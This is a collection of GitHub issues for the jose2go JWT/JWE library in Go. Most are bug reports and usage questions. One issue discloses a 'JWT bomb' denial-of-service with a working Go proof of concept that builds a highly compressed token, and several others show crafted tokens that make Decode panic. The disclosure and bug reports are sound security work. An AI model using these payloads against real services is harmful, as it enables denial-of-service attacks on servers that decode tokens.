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jose2go's Issues

Decode without verifying

It sounds weird, but I'm wondering whether it is possible to decode the token without verifying. My scenario is like this. I keep a map of user_id and their keys on the server, so I need to decode the token to get the user_id first, and look up their key to verify it later.

Currently the Decode function will not decode the token when a key is not provide or is incorrect. I'm hoping it will still decode the token, but return the key error separately. Think about the client can decode the token without the key.

GCM - PANIC - incorrect nonce length

The package panics if you provide a fake token where you change the length of the third section.

I made a very simple example using the GCM example in the README.
I removed one char from FePGIeMhhwVBPGLV which is the the third section.

sharedKey := []byte{194, 164, 235, 6, 138, 248, 171, 239, 24, 216, 11, 22, 137, 199, 215, 133}
fakeToken := "eyJhbGciOiJBMTI4R0NNS1ciLCJlbmMiOiJBMTI4R0NNIiwiaXYiOiItMTBMX3E4aVRPNlpuZ3Y4IiwidGFnIjoiUzlwSUZSV2hzOEp3djJ3VE82OF9vUSJ9.u5t1-HXQkDuSQfsz0sSV-g.FePGIeMhhwVBPGV.ciJXdFyuQ5ZiJUC-uPPigxa3._WG5rSsOxkujn_fzYvDp0Q"
jose.Decode(fakeToken, sharedKey)

This returns:

panic: cipher: incorrect nonce length given to GCM

goroutine 1 [running]:
crypto/aes.(*gcmAsm).Open(0xc4200a6a20, 0x0, 0x0, 0x0, 0xc42001a480, 0xb, 0xc, 0xc42001c390, 0x22, 0x30, ...)
	/usr/lib/go/src/crypto/aes/aes_gcm.go:137 +0x5c3
exit status 2

I believe checking the length before submitting to crypto/aes.Open would solve this.

Remove the base64url package


I'm not using this lib at all but came here from godoc. I think your base64url package functionality is already covered by RawURLEncoding (url encoding without padding) from the standard encoding/base64 package.

Have a nice day :)

Getting error expected key of size 256 bits, but was given 344 bits

I am trying to implement your code with a shareed key that we are generating through our KMS System.
But I get the below error:
AesGcm.Encrypt(): expected key of size 256 bits, but was given 344 bits.
Here is the code below
func encrypt(){
payload := "[email protected]"
keyBytes := []byte("8EGQNuDdLuiqqcQDrkBOLHcysp0Ans1R1PT5qM5_VP8")

if(keyBytes==nil) {
	panic("invalid key format")

token,err := jose.Encrypt(payload, jose.DIR, jose.A256GCM, keyBytes)
if(err==nil) {
    //go use token
    fmt.Printf("\nDIR A256GCM = %v\n",token)


func main(){

Can you please tell me how to fix this issue with this library?

Go 1.15: broken PBSE2 KDF

Since Go 1.15 beta 1, the test suite fails with these errors:

Testing    in: /builddir/build/BUILD/jose2go-1.3/_build/src
         PATH: /builddir/build/BUILD/jose2go-1.3/_build/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/sbin
       GOPATH: /builddir/build/BUILD/jose2go-1.3/_build:/usr/share/gocode
  GO111MODULE: off
      command: go test -buildmode pie -compiler gc -ldflags " -X -extldflags '-Wl,-z,relro -Wl,--as-needed  -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld '"
invalid sign 'alg' header err= jwt.Decode(): required 'alg' header is missing or of invalid type
missing sign 'alg' header err= jwt.Decode(): required 'alg' header is missing or of invalid type
two phased err= Test error
invalid encrypt 'alg' header err= jwt.Decode(): required 'alg' header is missing or of invalid type
invalid encrypt 'enc' header err= jwt.Decode(): required 'enc' header is missing or of invalid type
missing encrypt 'alg' header err= jwt.Decode(): required 'alg' header is missing or of invalid type
missing encrypt 'enc' header err= jwt.Decode(): required 'enc' header is missing or of invalid type
FAIL: jose_test.go:1588: TestSuite.TestDecrypt_PBSE2_HS256_A128KW_A128CBC_HS256
    c.Assert(err, IsNil)
... value *errors.errorString = &errors.errorString{s:"aes.KeyUnwrap(): integrity check failed."} ("aes.KeyUnwrap(): integrity check failed.")
FAIL: jose_test.go:1600: TestSuite.TestDecrypt_PBSE2_HS384_A192KW_A192CBC_HS384
    c.Assert(err, IsNil)
... value *errors.errorString = &errors.errorString{s:"aes.KeyUnwrap(): integrity check failed."} ("aes.KeyUnwrap(): integrity check failed.")
FAIL: jose_test.go:1612: TestSuite.TestDecrypt_PBSE2_HS512_A256KW_A256CBC_HS512
    c.Assert(err, IsNil)
... value *errors.errorString = &errors.errorString{s:"aes.KeyUnwrap(): integrity check failed."} ("aes.KeyUnwrap(): integrity check failed.")

Any chance that you take a look at what causing these issues?

Illegal token detection before jose.Decode()

Could I get a quick confirmation that in

token, err := jose.Encrypt(someString, jose.RSA_OAEP, jose.A256GCM, publicKey)

token is string and NOT base64?

I'm trying to see if there's a quick way to pre-disqualify a potentially malformed token BEFORE having to pay the price of doing

 j, err := jose.Decode(token, privateKey)

like you can with a base64 coded string:

 _, err := base64.StdEncoding.DecodeString(tokenString) 

for space/illegal chars/length=multiple of 4/etc.

Any ideas?

Constant overflows int while building Docker Notary

I am not sure if this is the right place to put this issue - if not, please point out which place would be better.

While building Docker Notary on an ARM server from Scaleway I did run in the following error which seems to be related to jose2go:

Step 25 : RUN set -x         && export GOPATH="$(mktemp -d)"         && git clone "$GOPATH/src/"         && (cd "$GOPATH/src/" && git checkout -q "$NOTARY_COMMIT")         && GOPATH="$GOPATH/src/$GOPATH"                 go build -o /usr/local/bin/notary-server         && rm -rf "$GOPATH"
 ---> Running in deb681959e8f
+ mktemp -d
+ export GOPATH=/tmp/tmp.m4xF2nR3Qm
+ git clone /tmp/tmp.m4xF2nR3Qm/src/
Cloning into '/tmp/tmp.m4xF2nR3Qm/src/'...
+ cd /tmp/tmp.m4xF2nR3Qm/src/
+ git checkout -q 8e8122eb5528f621afcd4e2854c47302f17392f7
+ GOPATH=/tmp/tmp.m4xF2nR3Qm/src/ go build -o /usr/local/bin/notary-server
tmp/tmp.m4xF2nR3Qm/src/ constant 4294967295 overflows int
tmp/tmp.m4xF2nR3Qm/src/ constant 4294967295 overflows int
The command '/bin/sh -c set -x         && export GOPATH="$(mktemp -d)"         && git clone "$GOPATH/src/"         && (cd "$GOPATH/src/" && git checkout -q "$NOTARY_COMMIT")         && GOPATH="$GOPATH/src/$GOPATH"                 go build -o /usr/local/bin/notary-server         && rm -rf "$GOPATH"' returned a non-zero code: 2

Is this a problem of jose2go or do I need to fix something else?

More information about the server, os, used go version, etc. can be found here:

Decryption of Nimbus JWE using RSA 4096 bit fails

I have an encrypted and signed JWE that was produced by Nimbus using 4096 bit RSA keys doing RSA_OAEP_256 with A128GCM. The signature is RS256. Using Nimbus I can decrypt and validate the signature. Using this I get a "crypto/rsa: decryption error" which is quite vague. What isn't clear to me is if there is a way to decrypt a JWE instead of a JWT. What is encrypted is arbitrary JSON and doesn't conform to the JWT specification (as that isn't my goal).

Tag for 1.2?

The readme mentions that 1.2 is the current version, but there isn't a tag for it -- is that just referring to that being the "in development" version, or was the tag simply an oversight? 😄

[Vuln] JWT bomb Attack in decode function

JWT bomb Attack in decode function

0x01 Affected version


version: Versions prior to v1.6.0 are vulnerable.

0x02 What kind of vulnerability is it? Who is impacted?

This vulnerability allows an attacker to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression.

0x03 Vulnerability details

The Proof of Concept (PoC) below demonstrates how this vulnerability can lead to a DoS attack:

package main

import (
	jose ""
	Rsa ""

var pubKey = `-----BEGIN CERTIFICATE-----

var privKey = `-----BEGIN RSA PRIVATE KEY-----

func PubKey() *rsa.PublicKey {
	key, _ := Rsa.ReadPublic([]byte(pubKey))
	return key

func PrivKey() *rsa.PrivateKey {
	key, _ := Rsa.ReadPrivate([]byte(privKey))
	return key

func main() {

	strU := strings.Repeat("U", 400000000)
	strUU := strings.Repeat("U", 100000000)

	payloadMap := map[string]string{
		"U":  strU,
		"UU": strUU,

	payloadBytes, err := json.Marshal(payloadMap)
	if err != nil {
		fmt.Println("Error marshaling payload to JSON:", err)

	payload := string(payloadBytes)

	test, _ := jose.Encrypt(payload, jose.RSA_OAEP, jose.A256GCM, PubKey(), jose.Zip(jose.DEF))
	fmt.Println("Compression String Length", len(test))

	fmt.Println("Measuring time:")
	start := time.Now()
	t, _, _ := jose.Decode(test, PrivKey())
	fmt.Println("Test Zip", len(t))
	timeElapsed := time.Since(start)
	fmt.Printf("The `decode` took %s", timeElapsed)

This vulnerability is demonstrated by comparing the processing times of a compressed token to an uncompressed token of the same length. The compressed token's processing time is significantly higher, showcasing the vulnerability's potential impact.


Code related to the vulnerability is located at jose.go

					if zip, compressed := jwtHeader["zip"].(string); compressed {

						if zipAlg, ok = jwcCompressors[zip]; !ok {
							return nil, nil, errors.New(fmt.Sprintf("jwt.decrypt(): Unknown compression algorithm '%v'", zip))

						plainBytes = zipAlg.Decompress(plainBytes)

					return plainBytes, jwtHeader, nil

0x04 Mitigation

To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.

0x05 References

[1] CVE-2024-21319

Panic on jwt/jws verify/decrypt with bad JSON headers

It is possible to make the jose.Decode call panic with a JSON header that's badly formatted.

Take this input:

    parts := []string{}
    for i := 0; i < 3; i++ {
        parts = append(parts, base64url.Encode([]byte(`{"something": 2}`)))
        secret = strings.Join(parts, ".")
        _, err := jose.Decode(secret, publicKey)

It will cause

goroutine 16 [running]:
    /usr/local/go/src/testing/testing.go:441 +0x181, 0x3, 0x3, 0x9fb3c0, 0xc20811c340, 0x0, 0x0, 0xc20811c340, 0x0, 0x0)
    /home/michal/Private/code/go/src/ +0x376, 0x44, 0x9fb3c0, 0xc20811c340, 0x0, 0x0, 0xc208105d20, 0x0, 0x0)
    /home/michal/Private/code/go/src/ +0x126

Similarly for decrypt method.

The extraction of header values needs validation and error handling.

Possible to get token.Header["alg"] for JWT vulnerability?

How does one check to make sure the token returned in the Authorization Bearer from the browser is not set to "none"? Something like this:

token := r.Header.Get("Authorization")[7:]

keyBytes, err := ioutil.ReadFile("file/path/to/privateKey")
 if err != nil {
     panic("invalid key file")

 privKey, e := Rsa.ReadPrivate(keyBytes)
 if e != nil {
     panic("invalid key format")

 j, err := jose.Decode(token, privKey)

 fmt.Println(j.Header["alg"]) // <-- Want to check for algo = "" vulnerability here

Or if the token header is:
"alg": "RSA-OAEP",
"enc": "A256GCM"
we don't have yo worry about the JWT alg:none problem?

Missing tag for 1.4 and 1.5

Hi, the README says "Current version is 1.5." However there's no such tag. Would you mind to create a tag?

How to decode zip DEFLATE compression token?

I am trying to parse a RS256 encoded token from java, it could be successfully decoded by public key in java using the following java code


Moreover, It could be decoded by golang example described at

package main

import (
    Rsa ""

func main() {

    token := "eyJhbGciOiJSUzI1NiIsImN0eSI6InRleHRcL3BsYWluIn0.eyJoZWxsbyI6ICJ3b3JsZCJ9.NL_dfVpZkhNn4bZpCyMq5TmnXbT4yiyecuB6Kax_lV8Yq2dG8wLfea-T4UKnrjLOwxlbwLwuKzffWcnWv3LVAWfeBxhGTa0c4_0TX_wzLnsgLuU6s9M2GBkAIuSMHY6UTFumJlEeRBeiqZNrlqvmAzQ9ppJHfWWkW4stcgLCLMAZbTqvRSppC1SMxnvPXnZSWn_Fk_q3oGKWw6Nf0-j-aOhK0S0Lcr0PV69ZE4xBYM9PUS1MpMe2zF5J3Tqlc1VBcJ94fjDj1F7y8twmMT3H1PI9RozO-21R0SiXZ_a93fxhE_l_dj5drgOek7jUN9uBDjkXUwJPAyp9YPehrjyLdw"

    keyBytes, err := ioutil.ReadFile("public.key")

    if(err!=nil) {
        panic("invalid key file")

    publicKey, e:=Rsa.ReadPublic(keyBytes)

    if(e!=nil) {
        panic("invalid key format")

    payload, headers, err := jose.Decode(token, publicKey)

    if(err==nil) {
        //go use token
        fmt.Printf("\npayload = %v\n",payload)

        //and/or use headers
        fmt.Printf("\nheaders = %v\n",headers)

I just replaced access token string and public key file, it successfully decoded my token and got

payload = xڪVJ�(P�245��4��42�Q�M�MJ-�LQ�R
-�P�  �%��╗�}��|\]���{���lZ�R-   ��

headers = map[alg:RS256 zip:DEF]

I doubt the problem is more likely because of token payload is "zip DEFLATE compression".
But I only found example to generate a zip encrypted token, but no example to decode it.

Could anyone help me to decode zip DEFLATE compression token?

Any comment is highly appreciated.

Best regards,


Magic panic on Decode()

I don't understand the magic panic on Decode()
I have 2 jwt keys with equals structure:

The First key is OK (decode without panic error):


But second one ("expire date" header is changed only) make Panic:


it looks like:

panic: interface conversion: interface is nil, not string
Stack trace:
goroutine 34 [running]:
runtime/debug.Stack(0x0, 0x0, 0x0)
    /usr/local/go/src/runtime/panic.go:426 +0x4e9, 0x5, 0x5, 0x414100, 0xc820172b20, 0x0, 0x0, 0x107, 0x0, 0x0)
    /Volumes/future.go/src/ +0x3ec, 0x107, 0x414100, 0xc820172b20, 0x0, 0x0, 0xc8201981e0, 0x0, 0x0)
    /Volumes/future.go/src/ +0x185
main.(*Token).parse(0xc8201981e0, 0xc82019cc60, 0x107, 0x120, 0xc820157768)

Please help me to understand this magic!
I check both keys here all is valid

I try to handle the error but all point to Decode() function

My decode block looks like this:
data, headers, err := jose.Decode(string(token), jwtSecretKey)

Nobody loves panic errors and I have to understand the problem.
Thank you for any help!

decode but not vertify

in python

i can just use jwt.decode(payload) without key, this will just decode and will vertify payload.

how i can do this in jose2go?

Last character of a jose.Encrypt() token can be altered without detection during jose.Decode()?

Last char value can be changed without affecting decoding validity?
(:boom: chars added only for emphasis here.)

token0 : original


jose.Decode(token0, privateKey) ==> OK

token1 : Last character changed w -> x


jose.Decode(token1, privateKey) ==> OK

token2 : Last character changed w -> y


jose.Decode(token2, privateKey) ==> OK

token3 : Penultimate character changed 0 -> 2


jose.Decode(token3, privateKey) ==> cipher: message authentication failed

token4 : 1 character in the middle changed S -> X


jose.Decode(token4, privateKey) ==> http: panic serving [::1]:53001: illegal base64 data at input byte 20

token5 : Last character changed w -> <-- {EMPTY}


jose.Decode(token5, privateKey) ==> http: panic serving [::1]:52959: illegal base64 data at input byte 20

Security vulnerabilities

To solve some problems of security related here, I think this is important:

jose.Decode(token, publicKey) ==>> jose.Decode(token, Algorithm, publicKey)

go get command fails

The go get command fails with the following errors.

$ go get
package jose2go/aes: unrecognized import path "jose2go/aes"
package jose2go/arrays: unrecognized import path "jose2go/arrays"
package jose2go/base64url: unrecognized import path "jose2go/base64url"
package jose2go/compact: unrecognized import path "jose2go/compact"
package jose2go/kdf: unrecognized import path "jose2go/kdf"
package jose2go/keys/ecc: unrecognized import path "jose2go/keys/ecc"
package jose2go/padding: unrecognized import path "jose2go/padding"

This most likely is due to using the short path jose2go/arrays for importing subpackages instead of the full path

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